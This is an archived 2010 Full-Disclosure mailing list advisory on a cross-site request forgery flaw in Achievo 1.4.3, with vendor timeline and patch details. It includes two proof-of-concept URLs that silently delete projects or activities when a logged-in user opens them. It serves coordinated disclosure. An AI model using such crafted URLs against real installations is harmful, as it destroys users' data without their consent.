[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] CYBSEC Advisory 2010 0902 Achievo 1.4.3 (CSRF)
From: "CYBSEC Labs" <cybseclabs () cybsec ! com>
Date: 2010-09-28 14:59:23
Message-ID: 1E50EAE1F4C34732B3A8DF869D24F078 () adcybsec ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Advisory Name: Cross Site Request Forgery in Achievo 1.4.3
Internal Cybsec Advisory Id: 2010-08-03
Vulnerability Class: Cross Site Request Forgery
Release Date: 2010-Sept-28
Affected Applications: Achievo 1.4.3 (other versions may be also vulnerable)
Affected Platforms: Any
Local / Remote: Remote
Severity: Medium CVSS#2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Researcher: Pablo G. Milano
Vendor Status: Confirmed / Patch is available
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
Vulnerability Description:
As application does not properly validate the "confirm" parameter in URL, a logged-in achievo \
user may be tricked to access an URL leading to deletion of tasks or projects without user?s \
confirmation
Proof of Concept:
1.. 1) To delete a project:
http://server/dispatch.php?atknodetype=project.project&atkselector=project.id='XXXX'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes \
(where XXXX is the project ID number)
1.. 2) To delete an activity:
http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'&confirm=Yes \
(where "XXXX? is the actual ID of the activity to be deleted)
Note: Even though a confirmation message is displayed to the user, at that point the activity \
has already been deleted.
Solution: Upgrade to version 1.4.5
Vendor Response:
2010-Aug-04: Vendor is contacted
2010-Aug-05: Vulnerabilities details are sent to vendor
2010-Aug-25: Vendor informs status
2010-Sept-27: Vendor and researcher agree publication date
2010-Sept-28: Vulnerability public disclosure / Patch is released
Contact Information:
For more information regarding the vulnerability feel free to contact the researcher at
pmilano <at> cybsec <dot> com
About CYBSEC S.A. Security Systems
Since 1996, CYBSEC is engaged exclusively in rendering professional services specialized in \
Information Security. Their area of services covers Latin America, Spain and over 250 customers \
are a proof of their professional life.
To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other \
software and/or hardware provider companies.
Our services are strictly focused on Information Security, protecting our clients from emerging \
security threats, maintaining their IT deployments available, safe, and reliable.
Beyond professional services, CYBSEC is continuously researching new defense and attack \
techniques and contributing with the security community with high quality information exchange. \
For more information, please visit www.cybsec.com
(c) 2010 - CYBSEC S.A. Security Systems
[Attachment #5 (text/html)]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.6001.18939">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><B><FONT size=2 face=Arial>Advisory Name: </FONT></B><FONT size=2
face=Arial>Cross Site Request Forgery in Achievo 1.4.3 </FONT></DIV>
<DIV><B>
<P><FONT size=2 face=Arial>Internal Cybsec Advisory Id: </FONT></B><FONT size=2
face=Arial>2010-08-03 </FONT></P><B>
<P><FONT size=2 face=Arial>Vulnerability Class: </FONT></B><FONT size=2
face=Arial>Cross Site Request Forgery </FONT></P><B>
<P><FONT size=2 face=Arial>Release Date: </FONT></B><FONT size=2
face=Arial>2010-Sept-28 </FONT></P><B>
<P><FONT size=2 face=Arial>Affected Applications: </FONT></B><FONT size=2
face=Arial>Achievo 1.4.3 (other versions may be also vulnerable) </FONT></P><B>
<P><FONT size=2 face=Arial>Affected Platforms: </FONT></B><FONT size=2
face=Arial>Any </FONT></P><B>
<P><FONT size=2 face=Arial>Local / Remote: </FONT></B><FONT size=2
face=Arial>Remote </FONT></P><B>
<P><FONT size=2 face=Arial>Severity: </FONT></B><FONT size=2 face=Arial>Medium
CVSS#2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) </FONT></P><B>
<P><FONT size=2 face=Arial>Researcher: </FONT></B><FONT size=2 face=Arial>Pablo
G. Milano </FONT></P><B>
<P><FONT size=2 face=Arial>Vendor Status: </FONT></B><FONT size=2
face=Arial>Confirmed / Patch is available </FONT></P><B>
<P><FONT size=2 face=Arial>Reference to Vulnerability Disclosure
Policy</FONT></B><FONT size=2 face=Arial>:
http://www.cybsec.com/vulnerability_policy.pdf </FONT></P><B>
<P><FONT size=2 face=Arial>Vulnerability Description: </FONT></P></B>
<P><FONT size=2 face=Arial>As application does not properly validate the
"confirm" parameter in URL, a logged-in achievo user may be tricked to access an
URL leading to deletion of tasks or projects without user‟s confirmation
</FONT></P><B>
<P><FONT size=2 face=Arial>Proof of Concept: </FONT></P>
<OL></B>
<LI><FONT size=2 face=Arial>1) To delete a project: </FONT></LI></OL><FONT
color=#000080><FONT color=#000080 size=2 face=Arial>
<P>http://server/dispatch.php?atknodetype=project.project&atkselector=project.id='XXXX'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes \
</P></FONT></FONT>
<P><FONT size=2 face=Arial>(where XXXX is the project ID number) </FONT></P>
<OL>
<LI><FONT size=2 face=Arial>2) To delete an activity: </FONT></LI></OL>
<P><FONT size=2
face=Arial>http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'&confirm=Yes \
</FONT></P>
<P><FONT size=2 face=Arial>(where „XXXX‟ is the actual ID of the activity to be
deleted) </FONT></P>
<P><FONT size=2 face=Arial>Note: Even though a confirmation message is displayed
to the user, at that point the activity has already been deleted. </FONT></P><B>
<P><FONT size=2 face=Arial>Solution: </FONT></B><FONT size=2 face=Arial>Upgrade
to version 1.4.5 </FONT></P>
<P><FONT size=2 face=Arial>Vendor Response: </FONT></P>
<P><FONT size=2 face=Arial>2010-Aug-04: Vendor is contacted </FONT></P>
<P><FONT size=2 face=Arial>2010-Aug-05: Vulnerabilities details are sent to
vendor </FONT></P>
<P><FONT size=2 face=Arial>2010-Aug-25: Vendor informs status </FONT></P>
<P><FONT size=2 face=Arial>2010-Sept-27: Vendor and researcher agree publication
date </FONT></P>
<P><FONT size=2 face=Arial>2010-Sept-28: Vulnerability public disclosure / Patch
is released </FONT></P>
<P><FONT size=2 face=Arial>Contact Information: </FONT></P>
<P><FONT size=2 face=Arial>For more information regarding the vulnerability feel
free to contact the researcher at </FONT></P>
<P><FONT size=2 face=Arial>pmilano <at> cybsec <dot> com </FONT></P>
<P><FONT size=2 face=Arial>About CYBSEC S.A. Security Systems </FONT></P>
<P><FONT size=2 face=Arial>Since 1996, CYBSEC is engaged exclusively in
rendering professional services specialized in Information Security. Their area
of services covers Latin America, Spain and over 250 customers are a proof of
their professional life. </FONT></P>
<P><FONT size=2 face=Arial>To keep objectivity, CYBSEC S.A. does not represent,
neither sell, nor is associated with other software and/or hardware provider
companies. </FONT></P>
<P><FONT size=2 face=Arial>Our services are strictly focused on Information
Security, protecting our clients from emerging security threats, maintaining
their IT deployments available, safe, and reliable. </FONT></P>
<P><FONT size=2 face=Arial>Beyond professional services, CYBSEC is continuously
researching new defense and attack techniques and contributing with the security
community with high quality information exchange. </FONT></P>
<P><FONT size=2 face=Arial>For more information, please visit <A
href="http://www.cybsec.com">www.cybsec.com</A> </FONT></P>
<P><FONT size=2 face=Arial>(c) 2010 - CYBSEC S.A. Security
Systems</FONT></P></DIV></BODY></HTML>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic